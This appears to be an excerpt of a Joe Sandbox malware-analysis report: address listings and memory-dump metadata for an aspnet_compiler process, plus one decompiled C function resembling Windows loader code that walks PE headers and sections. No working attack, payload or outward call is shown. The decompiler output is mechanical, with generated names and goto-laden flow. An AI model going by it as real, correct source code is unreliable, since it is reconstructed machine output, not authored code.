                                                  0x018deaa0
                                                  0x018deaa2
                                                  0x018deaa2
                                                  0x018deaae
                                                  0x018deab3
                                                  0x018deab6
                                                  0x018deabf
                                                  0x018deaca
                                                  0x018deacd
                                                  0x018dead1
                                                  0x018dead1
                                                  0x018deab8
                                                  0x018deab8
                                                  0x018deab8
                                                  0x018dead2
                                                  0x018dead9
                                                  0x01880f0e
                                                  0x01880f15
                                                  0x01880f17
                                                  0x01880f17
                                                  0x01880f1e
                                                  0x01880f23
                                                  0x018deae1
                                                  0x018deae1
                                                  0x01880f38
                                                  0x01880f3a
                                                  0x01880f3a
                                                  0x01880f49
                                                  0x01881108
                                                  0x01881108
                                                  0x01880f5b
                                                  0x018810c7
                                                  0x018810ca
                                                  0x018810cc
                                                  0x00000000
                                                  0x00000000
                                                  0x018810dc
                                                  0x018810de
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x01880f61
                                                  0x01880f61
                                                  0x01880f61
                                                  0x01880f67
                                                  0x01880f6b
                                                  0x0188111d
                                                  0x0188111d
                                                  0x01880f75
                                                  0x01880f77
                                                  0x01880f77
                                                  0x01880f85
                                                  0x01880f8b
                                                  0x018810b9
                                                  0x018810bc
                                                  0x018deae9
                                                  0x018deae9
                                                  0x01880f91
                                                  0x01880f91
                                                  0x01880f91
                                                  0x01880f96
                                                  0x01880f98
                                                  0x01880f9a
                                                  0x01880f9a
                                                  0x01880fa6
                                                  0x0188107c
                                                  0x0188107f
                                                  0x0188108d
                                                  0x00000000
                                                  0x0188108d
                                                  0x01881081
                                                  0x01881087
                                                  0x018deaf4
                                                  0x018deafa
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x018deb00
                                                  0x00000000
                                                  0x01880fac
                                                  0x01880fac
                                                  0x00000000
                                                  0x01880fac
                                                  0x01880fa6
                                                  0x01880f5b
                                                  0x01880f09
                                                  0x01880f09
                                                  0x00000000
                                                  0x01880f09
                                                  0x018dea63
                                                  0x00000000
                                                  0x018dea63
                                                  0x01880ef4
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x01880ef4
                                                  0x01880ebc
                                                  0x01880ebc
                                                  0x00000000
                                                  0x01880ebc
                                                  0x01880eb6
                                                  0x01881149
                                                  0x0188114c
                                                  0x0188114d
                                                  0x00000000
                                                  0x0188114d
                                                  0x01880ea4
                                                  0x01880ea7
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x01880fb7
                                                  0x01880fb7
                                                  0x01880fbc
                                                  0x01880fc9
                                                  0x01880fc9
                                                  0x01880fce
                                                  0x01881020
                                                  0x01881025
                                                  0x01881094
                                                  0x01881094
                                                  0x01881099
                                                  0x018dea04
                                                  0x018dea04
                                                  0x018dea09
                                                  0x018dea1c
                                                  0x018dea0b
                                                  0x018dea0b
                                                  0x018dea0e
                                                  0x018dea14
                                                  0x018dea14
                                                  0x018dea0e
                                                  0x018dea09
                                                  0x01881027
                                                  0x01881027
                                                  0x01881155
                                                  0x0188102d
                                                  0x0188102d
                                                  0x0188102d
                                                  0x01881032
                                                  0x018de9fc
                                                  0x018de9fc
                                                  0x01881032
                                                  0x01881027
                                                  0x00000000
                                                  0x01881025
                                                  0x01880fd0
                                                  0x018de9f4
                                                  0x00000000
                                                  0x018de9f4
                                                  0x01880fd6
                                                  0x01880fd9
                                                  0x01881059
                                                  0x01881059
                                                  0x0188105e
                                                  0x018de9ec
                                                  0x01881064
                                                  0x01881064
                                                  0x01881064
                                                  0x01881069
                                                  0x018810ac
                                                  0x0188106b
                                                  0x0188106b
                                                  0x0188106e
                                                  0x01881074
                                                  0x01881074
                                                  0x0188106e
                                                  0x01881069
                                                  0x00000000
                                                  0x0188105e
                                                  0x01880fdb
                                                  0x018810a4
                                                  0x00000000
                                                  0x018810a4
                                                  0x01880fe1
                                                  0x01880fe4
                                                  0x00000000
                                                  0x00000000
                                                  0x01880fea
                                                  0x01880ff1
                                                  0x00000000
                                                  0x01880ff8
                                                  0x00000000
                                                  0x00000000
                                                  0x018de9e4
                                                  0x00000000
                                                  0x00000000
                                                  0x01881018
                                                  0x00000000
                                                  0x00000000
                                                  0x01881051
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x01880ff1
                                                  0x01880fbe
                                                  0x01880fc3
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x01880fc3
                                                  0x01880df3
                                                  0x018de9d5
                                                  0x018de9d7
                                                  0x01881128
                                                  0x01881128
                                                  0x0188112b
                                                  0x0188112d
                                                  0x01881133
                                                  0x01881133
                                                  0x00000000
                                                  0x0188112d
                                                  0x00000000
                                                  0x018de9d7
                                                  0x01880dc2
                                                  0x018810f6
                                                  0x01880dd4
                                                  0x01880dd7
                                                  0x01880dda
                                                  0x01880de8
                                                  0x01880de9
                                                  0x01880de9
                                                  0x01880dda
                                                  0x00000000
                                                  0x01880dc2
                                                  0x01880dac
                                                  0x01880dae
                                                  0x01880db3
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 84634a092d2896c4c340192e1a49bf976df3c6840edf92c46deccfe7036a8472
                                                  • Instruction ID: 0ba83a5886e1d0df36a51d116b5d1b61dd702471435f22fae36b790bfde827ec
                                                  • Opcode Fuzzy Hash: 84634a092d2896c4c340192e1a49bf976df3c6840edf92c46deccfe7036a8472
                                                  • Instruction Fuzzy Hash: F3D1B431E0425D8FEB28EE9CC5957BEBBB1EB44305F14802AE542EB2C5D7749B86CB41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0189D5E0 Relevance: .4, Instructions: 353COMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 87%
                                                  			E0189D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x197d360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = L01896600(0x19752d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x1977b9c; // 0x0
							_t281 = L018A4620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E018CF3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x1977b90; // 0x772a0000
								if(_t384 == 0) {
									_t353 =  *0x1977b8c; // 0x1423d78
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E018A2280(_t200, 0x19784d8);
									_t277 =  *0x19785f4; // 0x1422018
									_t351 =  *0x19785f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0x1421fb0
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									L0189FFB0(_t287, _t353, 0x19784d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = L018DCC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = L01896600(0x19752d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E01897926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x197b239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E0190E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x1978472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														asm("ror edi, cl");
														 *0x197b1e0( &_v192, _t353, _v168, 0, _v180);
														 *( *0x197b218 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E018A2280(_t250, 0x19784d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L018C3898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																L0189FFB0(_t293, _t353, 0x19784d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	L018C37F5(_t353, 0);
																}
																L018C0413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E018B9B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E018B02D6(_t174);
																}
																L018A77F0( *0x1977b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E018BC277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L0189EC7F(_t353);
										L018B19B8(_t287, 0, _t353, 0);
										_t200 = L0188F4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L018A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0 || ( *0x197b2f8 |  *0x197b2fc) == 0 || ( *0x197b2e4 & 0x00000001) != 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return L018CB640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_v200 = 0;
									if(( *0x197b2ec >> 0x00000008 & 0x00000003) == 3) {
										_t355 = _v168;
										_t342 =  &_v208;
										_t208 = E01936B68(_v168,  &_v208, _v168, __eflags);
										__eflags = _t208 - 1;
										if(_t208 == 1) {
											goto L46;
										} else {
											__eflags = _v208 & 0x00000010;
											if((_v208 & 0x00000010) == 0) {
												goto L46;
											} else {
												_t342 = 4;
												_t366 = E01936AEB(_t355, 4,  &_v216);
												__eflags = _t366;
												if(_t366 >= 0) {
													goto L46;
												} else {
													asm("int 0x29");
													_t356 = 0;
													_v44 = 0;
													_t290 = _v52;
													__eflags = 0;
													if(0 == 0) {
														L108:
														_t356 = 0;
														_v44 = 0;
														goto L63;
													} else {
														__eflags = 0;
														if(0 < 0) {
															goto L108;
														}
														L63:
														_v112 = _t356;
														__eflags = _t356;
														if(_t356 == 0) {
															L143:
															_v8 = 0xfffffffe;
															_t211 = 0xc0000089;
														} else {
															_v36 = 0;
															_v60 = 0;
															_v48 = 0;
															_v68 = 0;
															_v44 = _t290 & 0xfffffffc;
															E0189E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
															_t306 = _v68;
															__eflags = _t306;
															if(_t306 == 0) {
																_t216 = 0xc000007b;
																_v36 = 0xc000007b;
																_t307 = _v60;
															} else {
																__eflags = _t290 & 0x00000001;
																if(__eflags == 0) {
																	_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																	__eflags = _t349 - 0x10b;
																	if(_t349 != 0x10b) {
																		__eflags = _t349 - 0x20b;
																		if(_t349 == 0x20b) {
																			goto L102;
																		} else {
																			_t307 = 0;
																			_v48 = 0;
																			_t216 = 0xc000007b;
																			_v36 = 0xc000007b;
																			goto L71;
																		}
																	} else {
																		L102:
																		_t307 =  *(_t306 + 0x50);
																		goto L69;
																	}
																	goto L151;
																} else {
																	_t239 = L0189EAEA(_t290, _t290, _t356, _t366, __eflags);
																	_t307 = _t239;
																	_v60 = _t307;
																	_v48 = _t307;
																	__eflags = _t307;
																	if(_t307 != 0) {
																		L70:
																		_t216 = _v36;
																	} else {
																		_push(_t239);
																		_push(0x14);
																		_push( &_v144);
																		_push(3);
																		_push(_v44);
																		_push(0xffffffff);
																		_t319 = L018C9730();
																		_v36 = _t319;
																		__eflags = _t319;
																		if(_t319 < 0) {
																			_t216 = 0xc000001f;
																			_v36 = 0xc000001f;
																			_t307 = _v60;
																		} else {
																			_t307 = _v132;
																			L69:
																			_v48 = _t307;
																			goto L70;
																		}
																	}
																}
															}
															L71:
															_v72 = _t307;
															_v84 = _t216;
															__eflags = _t216 - 0xc000007b;
															if(_t216 == 0xc000007b) {
																L150:
																_v8 = 0xfffffffe;
																_t211 = 0xc000007b;
															} else {
																_t344 = _t290 & 0xfffffffc;
																_v76 = _t344;
																__eflags = _v40 - _t344;
																if(_v40 <= _t344) {
																	goto L150;
																} else {
																	__eflags = _t307;
																	if(_t307 == 0) {
																		L75:
																		_t217 = 0;
																		_v104 = 0;
																		__eflags = _t366;
																		if(_t366 != 0) {
																			__eflags = _t290 & 0x00000001;
																			if((_t290 & 0x00000001) != 0) {
																				_t217 = 1;
																				_v104 = 1;
																			}
																			_t290 = _v44;
																			_v52 = _t290;
																		}
																		__eflags = _t217 - 1;
																		if(_t217 != 1) {
																			_t369 = 0;
																			_t218 = _v40;
																			goto L91;
																		} else {
																			_v64 = 0;
																			E0189E9C0(1, _t290, 0, 0,  &_v64);
																			_t309 = _v64;
																			_v108 = _t309;
																			__eflags = _t309;
																			if(_t309 == 0) {
																				goto L143;
																			} else {
																				_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																				__eflags = _t226 - 0x10b;
																				if(_t226 != 0x10b) {
																					__eflags = _t226 - 0x20b;
																					if(_t226 != 0x20b) {
																						goto L143;
																					} else {
																						_t371 =  *(_t309 + 0x98);
																						goto L83;
																					}
																				} else {
																					_t371 =  *(_t309 + 0x88);
																					L83:
																					__eflags = _t371;
																					if(_t371 != 0) {
																						_v80 = _t371 - _t356 + _t290;
																						_t310 = _v64;
																						_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																						_t292 =  *(_t310 + 6) & 0x0000ffff;
																						_t311 = 0;
																						__eflags = 0;
																						while(1) {
																							_v120 = _t311;
																							_v116 = _t348;
																							__eflags = _t311 - _t292;
																							if(_t311 >= _t292) {
																								goto L143;
																							}
																							_t359 =  *((intOrPtr*)(_t348 + 0xc));
																							__eflags = _t371 - _t359;
																							if(_t371 < _t359) {
																								L98:
																								_t348 = _t348 + 0x28;
																								_t311 = _t311 + 1;
																								continue;
																							} else {
																								__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																								if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																									goto L98;
																								} else {
																									__eflags = _t348;
																									if(_t348 == 0) {
																										goto L143;
																									} else {
																										_t218 = _v40;
																										_t312 =  *_t218;
																										__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																										if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																											_v100 = _t359;
																											_t360 = _v108;
																											_t372 = L01898F44(_v108, _t312);
																											__eflags = _t372;
																											if(_t372 == 0) {
																												goto L143;
																											} else {
																												_t290 = _v52;
																												_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - L018C3C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																												_t307 = _v72;
																												_t344 = _v76;
																												_t218 = _v40;
																												goto L91;
																											}
																										} else {
																											_t290 = _v52;
																											_t307 = _v72;
																											_t344 = _v76;
																											_t369 = _v80;
																											L91:
																											_t358 = _a4;
																											__eflags = _t358;
																											if(_t358 == 0) {
																												L95:
																												_t308 = _a8;
																												__eflags = _t308;
																												if(_t308 != 0) {
																													 *_t308 =  *((intOrPtr*)(_v40 + 4));
																												}
																												_v8 = 0xfffffffe;
																												_t211 = _v84;
																											} else {
																												_t370 =  *_t218 - _t369 + _t290;
																												 *_t358 = _t370;
																												__eflags = _t370 - _t344;
																												if(_t370 <= _t344) {
																													L149:
																													 *_t358 = 0;
																													goto L150;
																												} else {
																													__eflags = _t307;
																													if(_t307 == 0) {
																														goto L95;
																													} else {
																														__eflags = _t370 - _t344 + _t307;
																														if(_t370 >= _t344 + _t307) {
																															goto L149;
																														} else {
																															goto L95;
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																							}
																							goto L97;
																						}
																					}
																					goto L143;
																				}
																			}
																		}
																	} else {
																		__eflags = _v40 - _t307 + _t344;
																		if(_v40 >= _t307 + _t344) {
																			goto L150;
																		} else {
																			goto L75;
																		}
																	}
																}
															}
														}
														L97:
														 *[fs:0x0] = _v20;
														return _t211;
													}
												}
											}
										}
									} else {
										goto L46;
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}





































































































                                                  0x0189d5f2
                                                  0x0189d5f5
                                                  0x0189d5f5
                                                  0x0189d5fd
                                                  0x0189d600
                                                  0x0189d60a
                                                  0x0189d60d
                                                  0x0189d617
                                                  0x0189d61d
                                                  0x0189d627
                                                  0x0189d62e
                                                  0x0189d911
                                                  0x0189d913
                                                  0x00000000
                                                  0x0189d919
                                                  0x0189d919
                                                  0x0189d919
                                                  0x0189d634
                                                  0x0189d634
                                                  0x0189d634
                                                  0x0189d634
                                                  0x0189d640
                                                  0x0189d8bf
                                                  0x00000000
                                                  0x0189d646
                                                  0x0189d646
                                                  0x0189d64d
                                                  0x0189d652
                                                  0x018eb2fc
                                                  0x018eb2fc
                                                  0x018eb302
                                                  0x018eb33b
                                                  0x018eb341
                                                  0x00000000
                                                  0x018eb304
                                                  0x018eb304
                                                  0x018eb319
                                                  0x018eb31e
                                                  0x018eb324
                                                  0x018eb326
                                                  0x018eb332
                                                  0x018eb347
                                                  0x018eb34c
                                                  0x018eb351
                                                  0x018eb35a
                                                  0x00000000
                                                  0x018eb328
                                                  0x018eb328
                                                  0x00000000
                                                  0x018eb328
                                                  0x018eb326
                                                  0x0189d658
                                                  0x0189d658
                                                  0x0189d65b
                                                  0x0189d665
                                                  0x00000000
                                                  0x0189d66b
                                                  0x0189d66b
                                                  0x0189d66b
                                                  0x0189d66b
                                                  0x0189d66d
                                                  0x0189d672
                                                  0x0189d67a
                                                  0x00000000
                                                  0x00000000
                                                  0x0189d680
                                                  0x0189d686
                                                  0x0189d8ce
                                                  0x0189d8d4
                                                  0x0189d8dd
                                                  0x0189d8e0
                                                  0x0189d68c
                                                  0x0189d691
                                                  0x0189d69d
                                                  0x0189d6a2
                                                  0x0189d6a7
                                                  0x0189d6b0
                                                  0x0189d6b5
                                                  0x0189d6e0
                                                  0x0189d6b7
                                                  0x0189d6b7
                                                  0x0189d6b9
                                                  0x0189d6b9
                                                  0x0189d6bb
                                                  0x0189d6bd
                                                  0x0189d6ce
                                                  0x0189d6d0
                                                  0x0189d6d2
                                                  0x018eb363
                                                  0x018eb365
                                                  0x00000000
                                                  0x018eb36b
                                                  0x00000000
                                                  0x018eb36b
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0189d6bf
                                                  0x0189d6bf
                                                  0x0189d6e5
                                                  0x0189d6e7
                                                  0x0189d6e9
                                                  0x0189d6ec
                                                  0x0189d6ec
                                                  0x0189d6ef
                                                  0x0189d6f5
                                                  0x0189d6f9
                                                  0x0189d6fb
                                                  0x0189d6fd
                                                  0x0189d701
                                                  0x0189d703
                                                  0x0189d70a
                                                  0x0189d70a
                                                  0x0189d701
                                                  0x0189d710
                                                  0x0189d710
                                                  0x0189d6c1
                                                  0x0189d6c1
                                                  0x0189d6c6
                                                  0x018eb36d
                                                  0x018eb36f
                                                  0x00000000
                                                  0x018eb375
                                                  0x018eb375
                                                  0x018eb375
                                                  0x00000000
                                                  0x018eb375
                                                  0x00000000
                                                  0x0189d6cc
                                                  0x0189d6d8
                                                  0x0189d6d8
                                                  0x0189d6d8
                                                  0x00000000
                                                  0x0189d6c6
                                                  0x0189d6bf
                                                  0x00000000
                                                  0x0189d6da
                                                  0x0189d6da
                                                  0x0189d716
                                                  0x0189d71b
                                                  0x0189d720
                                                  0x0189d726
                                                  0x0189d726
                                                  0x0189d72d
                                                  0x00000000
                                                  0x0189d733
                                                  0x0189d739
                                                  0x0189d742
                                                  0x0189d750
                                                  0x0189d758
                                                  0x0189d764
                                                  0x0189d776
                                                  0x0189d77a
                                                  0x0189d783
                                                  0x0189d928
                                                  0x0189d92c
                                                  0x0189d93d
                                                  0x0189d944
                                                  0x0189d94f
                                                  0x0189d954
                                                  0x0189d956
                                                  0x0189d95f
                                                  0x0189d961
                                                  0x0189d973
                                                  0x0189d973
                                                  0x0189d956
                                                  0x0189d944
                                                  0x0189d92c
                                                  0x0189d78b
                                                  0x018eb394
                                                  0x0189d791
                                                  0x0189d798
                                                  0x018eb3a3
                                                  0x018eb3bb
                                                  0x018eb3bb
                                                  0x0189d7a5
                                                  0x0189d866
                                                  0x0189d870
                                                  0x0189d892
                                                  0x0189d898
                                                  0x0189d89e
                                                  0x0189d8a0
                                                  0x0189d8a6
                                                  0x0189d8ac
                                                  0x0189d8ae
                                                  0x0189d8b4
                                                  0x0189d8b4
                                                  0x0189d8ae
                                                  0x0189d7a5
                                                  0x0189d78b
                                                  0x0189d7b1
                                                  0x018eb3c5
                                                  0x018eb3c5
                                                  0x0189d7c3
                                                  0x0189d7ca
                                                  0x0189d7e5
                                                  0x0189d7eb
                                                  0x0189d8eb
                                                  0x0189d8ed
                                                  0x00000000
                                                  0x0189d8f3
                                                  0x0189d8f3
                                                  0x0189d8f3
                                                  0x00000000
                                                  0x0189d8ed
                                                  0x0189d7cc
                                                  0x0189d7cc
                                                  0x0189d7d2
                                                  0x00000000
                                                  0x0189d7d4
                                                  0x0189d7d4
                                                  0x0189d7d7
                                                  0x0189d7df
                                                  0x018eb3d4
                                                  0x018eb3d9
                                                  0x018eb3dc
                                                  0x018eb3dc
                                                  0x018eb3df
                                                  0x018eb3e2
                                                  0x018eb468
                                                  0x018eb46d
                                                  0x018eb46f
                                                  0x018eb46f
                                                  0x018eb475
                                                  0x0189d8f8
                                                  0x0189d8f9
                                                  0x0189d8fd
                                                  0x018eb3e8
                                                  0x018eb3e8
                                                  0x018eb3eb
                                                  0x018eb3ed
                                                  0x00000000
                                                  0x018eb3ef
                                                  0x018eb3ef
                                                  0x018eb3f1
                                                  0x018eb3f4
                                                  0x018eb3fe
                                                  0x018eb404
                                                  0x018eb409
                                                  0x018eb40e
                                                  0x018eb410
                                                  0x018eb410
                                                  0x018eb414
                                                  0x018eb414
                                                  0x018eb41b
                                                  0x018eb420
                                                  0x018eb423
                                                  0x018eb425
                                                  0x018eb427
                                                  0x018eb42a
                                                  0x018eb42d
                                                  0x018eb42d
                                                  0x018eb42a
                                                  0x018eb432
                                                  0x018eb436
                                                  0x018eb438
                                                  0x018eb43b
                                                  0x018eb43b
                                                  0x018eb449
                                                  0x018eb44e
                                                  0x018eb454
                                                  0x018eb458
                                                  0x018eb458
                                                  0x018eb45d
                                                  0x00000000
                                                  0x018eb45d
                                                  0x018eb3ed
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0189d7df
                                                  0x0189d7d2
                                                  0x0189d7ca
                                                  0x018eb37c
                                                  0x018eb37e
                                                  0x018eb385
                                                  0x018eb38a
                                                  0x00000000
                                                  0x018eb38a
                                                  0x0189d742
                                                  0x0189d7f1
                                                  0x0189d7f8
                                                  0x018eb49b
                                                  0x018eb49b
                                                  0x0189d800
                                                  0x0189d837
                                                  0x0189d843
                                                  0x0189d845
                                                  0x0189d847
                                                  0x0189d84a
                                                  0x0189d84b
                                                  0x0189d84e
                                                  0x0189d857
                                                  0x0189d818
                                                  0x0189d824
                                                  0x0189d831
                                                  0x018eb4a5
                                                  0x018eb4ab
                                                  0x018eb4b3
                                                  0x018eb4b8
                                                  0x018eb4bb
                                                  0x00000000
                                                  0x018eb4c1
                                                  0x018eb4c1
                                                  0x018eb4c8
                                                  0x00000000
                                                  0x018eb4ce
                                                  0x018eb4d4
                                                  0x018eb4e1
                                                  0x018eb4e3
                                                  0x018eb4e5
                                                  0x00000000
                                                  0x018eb4eb
                                                  0x018eb4f0
                                                  0x018eb4f2
